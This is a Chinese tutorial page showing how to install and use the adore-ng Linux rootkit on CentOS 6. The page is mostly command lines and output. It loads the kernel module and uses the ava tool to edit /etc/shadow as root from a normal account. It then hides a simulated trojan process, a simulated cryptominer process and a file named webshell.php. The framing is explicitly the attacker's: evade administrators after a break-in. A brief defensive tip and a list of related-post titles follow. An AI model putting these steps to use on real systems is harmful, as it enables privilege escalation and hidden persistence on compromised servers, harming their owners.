文章目录

  • 1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)
    • 1.1Rootkit概述
    • 1.2实战-通过rootkit隐蔽行踪
        • 1、安装adore-ng
        • 2、测试,查看帮助:
      • 实战1:演示ava提权功能
        • 1、准备测试环境
        • 2、创建一个普通用户
        • 3、通过ava命令提权,让普通用户xinsz08可以获得root权限
        • 4、使用r命令选项提权
        • 5、在别一个终端上查看,运行此vim进程的用户身份是root,说明提权成功
      • 实战2:隐藏你的木马程序
        • 1、模拟一个木马程序:
        • 2、打开另一个终端,以root身份可以查看到木马程序
        • 3、隐藏进程
        • 4、打开另一个终端,以root身份无法查看到木马程序
      • 实战3: 黑客隐藏木马程序文件
        • 1、创建测试文件
        • 2、隐藏文件
        • 3、尝试找出来webshell.php

1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)

1.1Rootkit概述

Rootkit概述:Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。我们接下来讲介绍 adore-ng (rootkit其中一种)的使用方法。 注:adore [əˈdɔ:®] 崇拜
adore-ng可以在linux系统下实现:提权,隐藏进程号,隐藏文件等功能
官网:https://github.com/trimpsyw/adore-ng

1.2实战-通过rootkit隐蔽行踪

实战背景: 当黑客已经上传了木马-》获得普通权限-》提权成root -》现在开始使用rootkit隐蔽行踪。

1、安装adore-ng

上传adore-ng-master.zip到linux系统上

root@xinsz08-1 yum.repos.d]# rpm  -ivh /mnt/Packages/kernel-devel-2.6.32-431.el6.x86_64.rpm  #安装依赖包
[root@zmedu63 ~]# unzip adore-ng-master.zip
[root@zmedu63 ~]# cd adore-ng-master
[root@zmedu63 adore-ng-master]# make -j 4            #编译,将源码编译成二进制文件,不需要执行make install 文件
[root@zmedu63 adore-ng-master]# insmod adore-ng.ko   #加载模块。
2、测试,查看帮助:
[root@zmedu63 adore-ng-master]# ./ava
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]I print info (secret UID etc)h hide file  #隐藏文件u unhide filer execute as root  #可以提权,以root身份运行程序R remove PID foreverU uninstall adorei make PID invisible  #隐藏进程。隐藏你的木马程序v make PID visible
实战1:演示ava提权功能
1、准备测试环境

创建一个普通用户于测试。然后在普通用户上,通过ava命令,提权后,以root身份运行一个进程。
提权概述:提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升普通用户的权限以夺得该服务器超级管理员权限。

2、创建一个普通用户
[root@xinsz08-1 ~]# useradd xinsz08
[root@xinsz08-1 ~]# echo 123456 |passwd --stdin xinsz08
3、通过ava命令提权,让普通用户xinsz08可以获得root权限
[root@zmedu63 adore-ng-master]# cp -r /root/adore-ng-master /tmp/    #复制木马程序到到/tmp,让普通用户xinsz08可以执行ava命令,方便演示提权
[root@zmedu63 adore-ng-master]# chmod 777 /tmp/adore-ng-master/ -R  #让xinsz08普通用户也可以使用木马程序
[root@zmedu63 adore-ng-master]# ssh xinsz08@192.168.1.63   #以普通帐号登录
[mk@zmedu63 ~]$ cd /tmp/adore-ng-master/
4、使用r命令选项提权
[mk@zmedu63 adore-ng-master]$ ll /etc/shadow    #普通用户对shadow没有权限
---------- 1 root root 1071 Apr  7 10:17 /etc/shadow
[mk@zmedu63 adore-ng-master]$ vim /etc/shadow  #发现打开,看不到内容,说明没有权限
使用ava提权
[mk@zmedu63 adore-ng-master]$  ./ava r vim /etc/shadow  #编辑时,可以写入一些内容,可以正常写入。说明提权成功。
5、在别一个终端上查看,运行此vim进程的用户身份是root,说明提权成功
[root@zmedu63 ~]#  ps -axu | grep shadow
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root      6874  0.1  0.1  10216  2924 pts/3    S+   04:12   0:00 /usr/bin/vim /etc/shadow
root      6879  0.0  0.0   4024   692 pts/2    S+   04:12   0:00 grep shadow
实战2:隐藏你的木马程序
1、模拟一个木马程序:
[mk@zmedu63 adore-ng-master]$ vim hack.sh
#!/bin/bash
while true
doecho `date` >> /tmp/date.txtsleep 1
done
[mk@zmedu63 adore-ng-master]$ chmod +x hack.sh    #赋予执行权限[root@zmedu63 adore-ng-master]$ ./hack.sh &         #后台执行
2、打开另一个终端,以root身份可以查看到木马程序
[root@zmedu63 ~]# ps -axu | grep hack.sh
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
mk     6339  0.0  0.1 106148  1184 pts/3    S    10:32   0:00 /bin/bash ./hack.sh
3、隐藏进程
[mk@zmedu63 adore-ng-master]$ ./ava i  6339  #隐藏进程
56,500,500,56
Adore 1.56 installed. Good luck.
Made PID 6339 invisible.
4、打开另一个终端,以root身份无法查看到木马程序
[root@zmedu63 ~]# ps -axu | grep hack.sh  #已经找不到木马程序了
扩展:miner 矿工,  minerd是一个挖比特币的木马程序 ,很多服务器被黑后,在深夜默默挖矿或被用于流量攻击。
[mk@zmedu63 adore-ng-master]$ cp hack.sh minerd.sh  #模拟一个挖矿木马
[mk@zmedu63 adore-ng-master]$ ./minerd.sh &
[2] 4553
[mk@zmedu63 adore-ng-master]$ ./ava i 4553  #隐藏挖矿木马进程,这样管理员就找不出来谁占了CPU了。有一些黑客没有隐藏进程,就会被发现。 如下图,就是阿里云平台上发现的一个木马报警信息。


总结:当黑客隐藏进程后,找不出隐藏的进程,怎么办? 当进程找不到时,可以查找一下被黑那天或前几天产生的新文件,进行分析。重点下可以让黑客在网页上上传文件的目录。如我的网站存储用户上传头像或图片的目录是/var/www/html/images ,那么可以执行:

[root@zmedu63 ~]# find /var/www/html/images  -mtime -1  #查找上传的文件
实战3: 黑客隐藏木马程序文件

实战场景:因为运维人员,可以按时间查出我的木马,所以我们可以把文件隐藏后,再执行木马程序。然后再把进程隐藏了。 这样运维人员,就彻底找不出后门了。

1、创建测试文件
[mk@zmedu63 adore-ng-master]$ mkdir test   #创建一个测试目录
[mk@zmedu63 adore-ng-master]$ cd test/
[mk@zmedu63 test]$ echo aaaa > webshell.php   #模拟一个木马
[mk@zmedu63 test]$ cat webshell.php
aaaa
[mk@zmedu63 test]$ touch b.php   #创建一个普通文件
[mk@zmedu63 test]$ ls
b.php  webshell.php
2、隐藏文件
[mk@zmedu63 test]$ /tmp/adore-ng-master/ava h webshell.php
56,500,500,56
Adore 1.56 installed. Good luck.
File 'webshell.php' is now hidden.
3、尝试找出来webshell.php
[mk@zmedu63 test]$ ls    #没有发现webshell.php文件。
b.php
[mk@localhost test]$ ls -a  #使用-a选项也没有发现webshell.php文件
.  ..  b.php尝试查找最近被黑客修改或创建的文件
[mk@zmedu63 test]$ find ./ -mtime -1   #还是没有发现
[mk@zmedu63 test]$ cat ./webshell.php  #黑客手动查看这个文件,还存在此目录下的,因为黑客自己知道文件的名字和路径,所以黑客自己还是可以执行木马的。
恢复出来:
[mk@zmedu63 test]$ /tmp/adore-ng-master/ava u webshell.php
56,500,500,56
Adore 1.56 installed. Good luck.
File 'webshell.php' is now visible.[mk@zmedu63 test]$ ls
b.php  webshell.php

Linux下手动查杀木马过程相关推荐

  1. Linux 下手动查杀木马过程

    模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的 3 种方法: (1).计划任务: crontab (2).开机启动 (3).系统命令被人替换,定一个触发事件 生成木马程序病原体 # vi ...

  2. Linux下手动查杀木马

    一. 模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的三种方法: 计划任务,crontab:开机启动:系统命令被替换,使用命令后被触发. 1. 生成木马程序病原体 [root@xuegod ...

  3. Linux下Verilog仿真过程(二)

    上一篇Linux下Verilog仿真过程(一)已经介绍了Verilog基本仿真问题 只不过仿真结果输出只是简单输出,不是很形象. 下面看一下"gui(图形用户界面)"的仿真结果. ...

  4. Linux下安装RealPlayer过程与问题(ubuntu版)

    在Ubuntu操作系统中安装Realplayer时,经常是提到只要用sudo apt-get install realplayer命令就可以解决了,但是事实中这个命令总是不能解决问题,我们在实际使用这 ...

  5. 浅析Linux下gcc编译过程

    目录 1. gcc简介及基本用法 2. gcc编译过程 3. 静态链接和动态链接 4. 静态库和动态库 4.1 静态库的制作和使用 4.2 动态库的制作和使用 1. gcc简介及基本用法   GCC( ...

  6. ubuntu linux下安装boch过程

    记录一下linux下安装boch需要注意的地方. 1. 在新安装的ubuntu的linux后,需要立即编辑源列表文件.具体方法见: http://wiki.ubuntu.org.cn/Qref/Sou ...

  7. Linux查看ice版本,转Linux下安装Ice过程

    ICE在Linux下的完整编译安装 安装平台要求:最好用gcc 4.x版编译ICE,在Slackware下发现gcc3.3.6和gcc3.4.6都无法编译通过 为了方便管理,将ICE相关的软件都安装到 ...

  8. linux怎么进入root文件,linux下安装ROOT过程

    说明: 这是我安装ROOT的过程,仅供参考,如果有哪个地方没说清楚或者有错误,非常希望能告诉我.如果想对ROOT安装有详尽的了解,可以参考官网的说明. 我的linux发行版为Ubuntu14.04,R ...

  9. linux下 DNS配置过程『罗斌原创』

    DNS配置过程 任务1:配置主DNS 1.检查是否安装了bind软件包,rpm -qa | grep bind 如果没有安装则挂载第四张光盘, mount -t iso9660 /dev/cdrom ...

最新文章

  1. 自动化监控--zabbix中的用户和用户组详解
  2. 【译】Diving Into The Ethereum VM Part 4 - How To Decipher A Smart Contract Method Call
  3. IDEA把Java Web导出为war文件
  4. 高性能视频推理引擎优化技术
  5. 洛谷—P1307 数字反转
  6. Matlab 画图字体,字号的设定,图片大小和比例
  7. http协议知识msdn
  8. JS 日期对象常用函数(时间常用函数、日期格式化)
  9. 学习索引结构的一些案例——Jeff Dean在SystemML会议上发布的论文(下)
  10. 枚举进程ID并且获得进程路径
  11. 创建phpinfo.php
  12. Selenium2+python自动化6-八种元素元素定位(Firebug和firepath)
  13. time stamp convert
  14. 三月校赛1006 wuli通通和Fibonacci (a[n]=f[n]*(n^m)的前k项和)
  15. 16.火焰传感器实验
  16. python四位数字加密_python实现字符串加密成纯数字
  17. H5新特性 - 新增标签
  18. 如何在服务器上配置深度学习环境
  19. G002-186-18
  20. fabric框架学习

热门文章

  1. 5.微博绑定用户接口
  2. 如何查看MySQL数据库的版本
  3. 中国第一封email
  4. 书法练字帖纸——井字格获得国家知识产权局专利证书
  5. SpringBoot重点详解--整合hive-jdbc
  6. 计算机毕设Python+Vue医院管理系统(程序+LW+部署)
  7. 计算机视频分析,暴雨/夜间/人群密集难倒视频分析?三篇CVPR2021论文攻克这些难题...
  8. python在工业机器人上的应用_请简述工业机器人主要应用场合
  9. 网络版计算机化系统3q认证,高效液相液色仪3Q认证服务|气相色谱仪3Q认证确认服务...
  10. IntentFilter简述